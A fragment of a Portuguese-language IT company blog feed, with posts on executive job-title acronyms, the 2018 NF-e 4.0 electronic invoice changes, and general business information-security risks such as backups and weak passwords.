• CTO (Chief Technology Officer) – Diretor de tecnologia. Deve comandar a área de tecnologia de uma empresa ou Pesquisa e Desenvolvimento.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CIO (Chief Information Officer) – Diretor de TI. Responsável pela área de informática de uma empresa. A diferença entre o CTO e o CIO é que o primeiro desenvolve tecnologia para vendas, enquanto o segundo cria recursos para uso interno.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s1600/baneer.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;340&quot; data-original-width=&quot;1600&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s400/baneer.jpeg&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Além destas, há ainda várias outras siglas que são menos utilizadas, mas também determinam cargos de alta importância. Algumas chegam até mesmo a se repetir para determinar posições distintas. Confira exemplos:&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CAO (Chief Accounting Officer) - Diretor de contabilidade;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CAO (Chief Academic Officer) - Diretor acadêmico, no comando de assuntos acadêmicos em uma instituição de ensino;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CBO (Chief Brand Officer) - Diretor de marca;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CBO (Chief Business Officer) - Diretor de negócios;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CCO (Chief Communications Officer) - Diretor de comunicações;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CCO (Chief Creative Officer) - Diretor criativo;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CCO (Chief Content Officer) - Diretor de conteúdo;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CDO (Chief Diversity Officer) - Diretor de diversidade. Responsável por ações de diversidade e inclusão social&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CDO (Chief Design Officer) - Diretor de design;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CHRO (Chief Human Resources Officer) - Diretor de Recursos Humanos;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CLO (Chief Legal Officer) - Diretor jurídico;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CSO (Chief Science Officer) – Diretor científico. Responsável pela pesquisa e criação de novas tecnologias.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlWsp5xW3IwMkwmRDfg8cK2bDFBhSF-lT92cMFPYRFMUHDk-ctK4JtrM97W_pmOqyxwOeFOsVpxan8PmjeaxmFpUR2v7S9dY8AN7QzPP5G8ZVz_dq2YQDEOA1IGXJDddstRDiI3rTkNv0/s1600/anuncie2.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;60&quot; data-original-width=&quot;468&quot; height=&quot;80&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlWsp5xW3IwMkwmRDfg8cK2bDFBhSF-lT92cMFPYRFMUHDk-ctK4JtrM97W_pmOqyxwOeFOsVpxan8PmjeaxmFpUR2v7S9dY8AN7QzPP5G8ZVz_dq2YQDEOA1IGXJDddstRDiI3rTkNv0/s400/anuncie2.gif&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;</description><link>http://computersservicetecnica.blogspot.com/2018/08/ceo-cfo-cio-afinal-o-que-estas-siglas.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW6b4YgxLnOzr7jIpEtD-pDfFYV3WUPXSyN4xKr1qO8E-HfPenpuRosgMlaAM3kckzxs4dF9qjApn0sczK25RxTsHpbZwrVqMtccL2oHdecyGqdh-otclh_f2rrJcNceCHWhuHiXl_xF4/s72-c/CEO.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-6082032227965721759</guid><pubDate>Thu, 16 Aug 2018 22:36:00 +0000</pubDate><atom:updated>2018-08-16T19:36:19.569-03:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;Mudanças na emissão de notas fiscais em 2018: fique por dentro da NF-e 4.0&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkffF6KVG6O-wZGvWz2AlzaETAVcec2sfJm5Zc18snWn8M2uCGJqTHTcIXANlQrkn8M1x_KK27lW9ZJMc9eLkV3tQm6-rM0NYfGH9tgmPtBjX8gYrMoT62YawKN-6IAAwb8g4VEGYnK_M/s1600/Untitled+-+1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;367&quot; data-original-width=&quot;825&quot; height=&quot;177&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkffF6KVG6O-wZGvWz2AlzaETAVcec2sfJm5Zc18snWn8M2uCGJqTHTcIXANlQrkn8M1x_KK27lW9ZJMc9eLkV3tQm6-rM0NYfGH9tgmPtBjX8gYrMoT62YawKN-6IAAwb8g4VEGYnK_M/s400/Untitled+-+1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Já está por dentro da NF-e 4.0? Durante o ano de 2018, haverá mudanças na emissão de notas fiscais. Em agosto, o novo padrão para a validação das notas estará em funcionamento. Se você vende produtos (bens e mercadorias), deve ficar ligado nas alterações do documento.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;b&gt;Entenda o que é NF-e 4.0 e o fim da NF-e 3.10&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
NF-e 4.0 é a &quot;cara&quot; nova da nota fiscal eletrônica de mercadorias. Ela se aplica a compras e vendas de produto, com regras específicas e diferentes do padrão usado anteriormente (NF-e 3.10). O arquivo XML da nota agora passa a ter uma nova organização e o sistema emissor precisa estar preparado para isso.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Depois de três anos, a “cara” da NF-e (nota fiscal eletrônica) está de mudança. Nota Técnica 2016.002, divulgada em novembro de 2016 pela Encat (Coordenação Técnica do Encontro Nacional de Coordenadores e Administradores Tributários Estaduais) estabelece um novo layout da NF-e 4.0 para o documento fiscal, emitido em operações envolvendo produtos.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;b&gt;Quando a NF-e 4.0 passa a valer?&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
A NF-e 4.0 já funciona desde 2017, mas ela será obrigatória a partir de 2 de agosto de 2018. Essa é a data definitiva: depois disso, notas no padrão 3.10 não serão mais validadas pelos órgãos do governo (Sefaz).&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Só lembrando, a nota fiscal eletrônica só existe digitalmente: é um arquivo eletrônico no formato XML, que carrega as informações de uma operação de compra ou venda organizadas de forma estruturada. Essa estrutura, no arquivo XML, recebe o nome de &quot;layout&quot; (ou leiaute, em uma versão aportuguesada do termo, usada com frequência pela Receita Federal).&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
A nova versão do documento fiscal é fruto da mais significativa mudança promovida na NF-e nos últimos anos e obedece a uma política do Encat de só mexer no leiaute da nota quando há necessidades de alterações acumuladas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
A razão para isso é bastante fácil de compreender, pois cada modificação acaba exigindo ajustes tanto nos sistemas emissores quanto nas secretarias estaduais da Fazenda e nas próprias empresas que diariamente utilizam o documento em operações de compra e venda de mercadorias.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s1600/baneer.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;340&quot; data-original-width=&quot;1600&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s400/baneer.jpeg&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;b&gt;NF-e 4.0: Sequência de prazos para as mudanças&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Desde 2014, a versão em uso é a 3.10, mas o novo leiaute da NF-e 4.0 já tem cronograma para entrar em vigor. A partir de 1º de junho, será iniciado o ambiente de homologação. Dois meses depois, será a vez do ambiente de produção com a nova versão. Mas a desativação completa, inicialmente prevista para ocorrer ainda em 2017, vai ficar para agosto de 2018.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Na prática (segundo a &lt;a href=&quot;http://www.nfe.fazenda.gov.br/portal/listaConteudo.aspx?tipoConteudo=tW+YMyk/50s=&quot; target=&quot;_blank&quot;&gt;versão 1.60 da NT2016.002&lt;/a&gt;):&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Ambiente de Homologação para testes por sistemas e por emissores: 20/11/2017
(prazo mantido)
Início dos testes dos programas emissores de nota. As notas na versão 3.10 ainda serão válidas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Ambiente de Produção para emitir notas no novo layout: 02/07/2018
(prazo alterado em 18/6/2018)
Início do funcionamento na prática da emissão e validação das notas. Tanto as notas na versão 3.10 quanto 4.0 serão aceitas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Desativação da versão 3.10 do layout anterior da nota:  02/08/2018
(prazo alterado em 18/6/2018)
Prazo máximo para a migração para NF-e 4.0. A partir daqui, a versão 3.10 não será mais aceita pelo governo.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Até agosto de 2018, nenhuma empresa será obrigada a adotar a NF-e 4.0, embora seja recomendado para se habituar às novidades.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Entretanto, nada impede que notas já sejam geradas por fornecedores contra o seu CNPJ a partir de agosto, adotando o novo leiaute. Nesse caso, o recebimento do arquivo XML da nota fiscal já deverá atender ao formato atualizado.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;b&gt;Quem deve se preocupar com a mudança?&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Muitas das mudanças na emissão de notas fiscais são estritamente técnicas e não devem preocupar os donos de negócios, desde que já estejam usando um &lt;a href=&quot;https://computersservice.com.br/automacao-comercial.html&quot; target=&quot;_blank&quot;&gt;sistema emissor confiável.&lt;/a&gt; Isso porque quem precisará se ocupar de atualizar a solução para a nova versão são as empresas que fornecem a tecnologia.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Quem usa tecnologias ultrapassadas e não migrar para a NF-e 4.0 até o prazo limite estabelecido, não poderá mais emitir os documentos fiscais. Na prática, isso significaria ficar irregular em caso de uma venda ou compra descoberta de nota fiscal.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Se você utiliza os serviços da Computers Service Informática, fique tranquilo, pois o sistema será atualizado e vai continuar facilitando o preenchimento dos campos do documento fiscal. Ainda não é cliente? &lt;a href=&quot;https://computersservice.com.br/automacao-comercial.html&quot; target=&quot;_blank&quot;&gt;Comece agora&lt;/a&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;b&gt;As principais mudanças na emissão de notas fiscais&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Entre as novidades, vale destacar a adoção do protocolo TLS 1.2 ou superior, sendo vedado o uso do protocolo SSL como padrão de comunicação, como vinha ocorrendo. O que é interessante saber sobre a alteração é que ela objetiva garantir maior segurança ao processo, o que não ocorria em razão da alegada vulnerabilidade do protocolo SSL.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjayzs7FpdgV8a3_BTPOnvxRl2R3mRdaD_FMrX2n-37J8vQ_N4gLw_Nrn0NtH2QLMTpNVrJiqSS3QGAZ-QGNwaDc-DVNbn9KURY0gyUijF1yeQyTCWpiUwY2EmGsTbmQu1QL41sR1hLKwU/s1600/banner+C.C.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;216&quot; data-original-width=&quot;407&quot; height=&quot;211&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjayzs7FpdgV8a3_BTPOnvxRl2R3mRdaD_FMrX2n-37J8vQ_N4gLw_Nrn0NtH2QLMTpNVrJiqSS3QGAZ-QGNwaDc-DVNbn9KURY0gyUijF1yeQyTCWpiUwY2EmGsTbmQu1QL41sR1hLKwU/s400/banner+C.C.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Também estão previstas modificações diversas em regras de validação, em atendimento a novos campos ou a novos controles.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Quanto ao conteúdo da nova NF-e, é recomendável ter atenção especial ao Fundo de Combate à Pobreza (FCP), previsto pela Constituição Federal e que recebe recursos oriundos do ICMS, o Imposto sobre Circulação de Mercadorias e Serviços.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O novo leiaute traz campos relativos ao FCP para operações internas ou interestaduais com ou sem substituição tributária, devendo ser identificado o valor devido em decorrência do percentual do imposto recolhido ao fundo. Base de cálculo e ocorrência de retenção aplicada o FCP também receberam novos campos.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Outra informação importante é que o campo indicador da forma de pagamento agora passa a integrar o Grupo de Informações de Pagamento, que, por sua vez, inova ao prever o preenchimento com dado sobre o valor de troco.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Além disso, se antes o campo se restringia a informar se o pagamento ocorreu à vista ou a prazo, agora é preciso informar qual o meio de pagamento utilizado, como dinheiro, cheque, cartão de crédito, de débito ou vale alimentação, entre outros.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Também aparecem entre as novidades da NF-e 4.0 as seguintes modificações:&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
* No Grupo Identificação da Nota Fiscal Eletrônica, o campo Indicador de presença (indPres) agora pode ser preenchido com a opção 5 (operação presencial, fora do estabelecimento), que é o que ocorre no caso de venda ambulante.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
* Por sua vez, o Grupo X-Informações do Transporte da NF-e ganhou duas novas modalidades de frete. São elas: transporte próprio por conta do remetente e transporte próprio por conta do destinatário.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
* Já o Grupo Rastreabilidade de Produto, que hoje não existe, passará a vigorar no novo leiaute. Sua função é trazer informações que permitam o rastreamento de produtos sujeitos a regulações sanitárias, como é o caso de defensivos agrícolas, itens veterinários, odontológicos, medicamentos, bebidas, águas envasadas e embalagens.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
* Por fim, quando se trata de medicamentos, o código da Agência Nacional de Vigilância Sanitária (Anvisa) deve ser informado em campo específico que estreia nesta versão do documento.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s1600/baneer.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;340&quot; data-original-width=&quot;1600&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s400/baneer.jpeg&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;center&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;b&gt;Prepare-se para a NF-e 4.0: a Computers Service Informática está pronta&lt;/b&gt;&lt;/span&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Neste artigo, falamos sobre as principais mudanças na emissão de notas fiscais promovida pela atualização de seu leiaute. Como muitas dessas alterações são de linguagem técnica, você que é dono de negócio pode imaginar que o conteúdo tenha interesse restrito.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Mas não se engane: a estimativa é que haja 1,3 milhão de empresas emissoras de NF-e no Brasil. Todas elas terão que adaptar seus sistemas ao novo padrão.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Menos mal para você se já utiliza uma solução completa, como a ofertada pela Computers Service Informática, que vai além da emissão de NF-e para disponibilizar uma ferramenta que agrega resultados ao controle e à gestão financeira.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Se você já faz uso da tecnologia, aproveite o novo leiaute da nota fiscal eletrônica para que possa estabelecer um período de transição confortável e seguro. Lembrando que a correção no documento é fundamental para prevenir problemas com órgãos de fiscalização e para tornar a tomada de decisão na empresa mais simples e eficiente.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Ainda não é cliente? &lt;a href=&quot;https://computersservice.com.br/automacao-comercial.html&quot; target=&quot;_blank&quot;&gt;Comece agora.&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;</description><link>http://computersservicetecnica.blogspot.com/2018/08/mudancas-na-emissao-de-notas-fiscais-em.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkffF6KVG6O-wZGvWz2AlzaETAVcec2sfJm5Zc18snWn8M2uCGJqTHTcIXANlQrkn8M1x_KK27lW9ZJMc9eLkV3tQm6-rM0NYfGH9tgmPtBjX8gYrMoT62YawKN-6IAAwb8g4VEGYnK_M/s72-c/Untitled+-+1.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-3845520807910127568</guid><pubDate>Sat, 11 Aug 2018 18:25:00 +0000</pubDate><atom:updated>2018-08-11T15:25:22.647-03:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 15px;&quot;&gt;Segurança da informação em empresas: maiores riscos e como se proteger!&lt;/span&gt;&lt;/h2&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMs3a0YmFhFd4JmjKAK_BaByfb-G1nYnHplLaWUkCLZJkI7_r3hChPKz9nG8FVy8UzWTgGKVu5efoeeO5fqNTBVlrMCqTFz6F3Zh8t3BwvUddVi9O_9fr_nA5CNc2Du1LwB8QPwI0-GS4/s1600/1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;375&quot; data-original-width=&quot;500&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMs3a0YmFhFd4JmjKAK_BaByfb-G1nYnHplLaWUkCLZJkI7_r3hChPKz9nG8FVy8UzWTgGKVu5efoeeO5fqNTBVlrMCqTFz6F3Zh8t3BwvUddVi9O_9fr_nA5CNc2Du1LwB8QPwI0-GS4/s320/1.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
É muito comum hoje em dia escutarmos notícias na mídia sobre cyber-ataques e falhas na segurança da informação em grandes corporações e até em órgãos governamentais, como o que aconteceu nos Estados Unidos ano passado e este ano. O mais alarmante é que esses ataques, conhecidos também como sequestro de dados (ataque ransomware, WannaCry, crypto-ransomware), estão atingindo empresas brasileiras de pequeno e médio porte, devido a maior vulnerabilidade.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Um estudo publicado pela ESET aponta que 65% das empresas brasileiras já tiveram problemas com a segurança da informação, e o mais assustador disso é que mais da metade das empresas pesquisadas tem política de segurança definida.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Com a tecnologia à disposição de todos e totalmente inserida no nosso dia a dia, criou-se um ambiente bastante fértil para os “ladrões” de dados fazerem o download de todas essas informações. Em função disso, há a tendência de cada vez mais as empresas investirem na segurança da informação. Segundo artigo publicado pela PWC, a média de orçamento com segurança da informação aumentou 51% nas empresas em relação ao ano passado.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Em uma empresa da indústria da construção a preocupação não é diferente, há uma quantidade imensa de dados e informações que precisam ser muito bem preservadas, pois elas são essenciais para o negócio.  Já imaginou que pesadelo perder todos os seus projetos, orçamentos e documentos? Pensando nisso, desenvolvemos esse conteúdo, para alertar quanto aos riscos (pontos de vulnerabilidade) aos quais sua empresa está exposta, orientar sobre prevenção e demonstrar os benefícios em despender maior atenção a essa operação em sua empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s1600/baneer.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;340&quot; data-original-width=&quot;1600&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s400/baneer.jpeg&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;Fique atento:&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 18px;&quot;&gt;1 – Não possuir uma política de back-up:&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Se você trabalha com servidor local, provavelmente tem em sua empresa alguém responsável por realizar o backup dos dados periodicamente. Mas será que esse período é suficiente? O backup é salvo em local seguro? A PWC divulgou que 25% das empresas têm processos organizados para prevenir a perda de informações. A maioria delas faz backups manuais e apenas de vez em quando verifica se as cópias foram realizadas corretamente. No modelo de sequestro de dados, a maior perda das empresas, além de ter seus dados em mãos de terceiros, é não saber por onde recomeçar o trabalho, pois não tem backup ou o mesmo está desatualizado.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 18px;&quot;&gt;2- Servidor:&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Centralizar os dados da empresa em um servidor local é um grande fator de vulnerabilidade. A dica de segurança é: use um data center. Uma pesquisa da PWC mostra que 47% das empresas entrevistadas utilizam computação na nuvem, 24% a mais que ano passado, sendo que dessas empresas 59% informam que sua postura em relação a segurança melhorou.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 18px;&quot;&gt;3 – Imprimir documentos:&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Você costuma imprimir documentos com informações importantes? Poucos sabem, mas as impressoras são uma das principais fontes de vazamento de dados.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 18px;&quot;&gt;4- Senhas fáceis de descobrir:&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Os hackers constantemente criam novas estratégias de ataque e softwares para descobrir senhas. Os programas mais conhecidos testam nomes próprios, palavras do dicionário ou títulos de filmes e nome de personagens famosos, e testam milhões de combinações de letras e números possíveis até descobrir a correta. Pode parecer um ponto simples, mas é uma das formas mais fáceis de um hacker invadir seus dados.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
